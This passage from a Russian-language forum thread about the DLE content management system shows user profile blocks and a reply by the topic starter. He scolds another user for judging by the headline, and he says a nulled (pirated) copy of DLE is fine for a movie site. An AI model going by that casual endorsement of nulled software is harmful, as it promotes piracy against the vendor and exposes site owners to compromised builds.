    • Нравится Нравится x 1
  19. Alex_pp

    PRO Users

    Регистрация:
    1 сен 2020
    Сообщения:
    420
    Лучших ответов:
    0
    Рейтинги:
    +129 / 28 / -0
  20. TopicStarter Overlay
    TacTics

    PRO Users

    Регистрация:
    3 мар 2022
    Сообщения:
    384
    Лучших ответов:
    0
    Рейтинги:
    +164 / 17 / -0
    Skyworker, иногда полезно читать все посты в теме, а не только заголовок. А то получается, что ты из тех, кто прочитал новость на новостном портале по загаловку и побежал пересказывать её всем подряд. Статьи всё-таки стоит читать до конца - это полезно, в том числе и для того, чтобы, во-первых, не оскорблять людей без причины.

    Во-вторых, у меня есть лицензии на все легальные проекты. Для киносайта, думаю, можно поставить и нулл. Да и за всю историю моего использования DLE такое у меня впервые.
     
Яндекс.Метрика